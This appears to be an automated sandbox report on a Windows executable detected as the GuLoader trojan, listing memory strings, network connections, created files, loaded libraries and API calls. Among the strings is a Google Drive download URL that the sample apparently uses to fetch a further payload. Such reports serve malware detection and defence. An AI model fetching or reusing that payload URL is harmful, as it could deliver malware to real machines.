Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloade
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadid
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloads2
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadsz
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadt
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download~I
Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3417659482.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.4118336265.00000000034A3000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000345C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3104612858.0000000003466000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49968 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49990 version: TLS 1.2

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403348

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	File created: C:\Windows\resources\0809			Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	File created: C:\Windows\Arder.lnk			Jump to behavior

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_72A41A98	0_2_72A41A98

Source: eAvqHiIsgR.exe

Static PE information: invalid certificate

Source: eAvqHiIsgR.exe, 00000000.00000000.2053679157.0000000000458000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
Source: eAvqHiIsgR.exe, 00000005.00000000.3006856688.0000000000458000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
Source: eAvqHiIsgR.exe	Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe

Source: eAvqHiIsgR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal76.troj.evad.winEXE@3/8@2/2

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

0_2_00403348

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

File created: C:\Users\user\tranchet

Jump to behavior

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

File created: C:\Users\user\AppData\Local\Temp\nse2344.tmp

Jump to behavior

Source: eAvqHiIsgR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: eAvqHiIsgR.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

File read: C:\Users\user\Desktop\eAvqHiIsgR.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"	Jump to behavior

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Arder.lnk.0.dr

LNK file: ..\Users\user\Disannex.And37

Source: eAvqHiIsgR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.4521613318.00000000021F4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3670179410.0000000003404000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Code function: 0_2_72A41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_72A41A98

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Code function: 0_2_72A42F60 push eax; ret

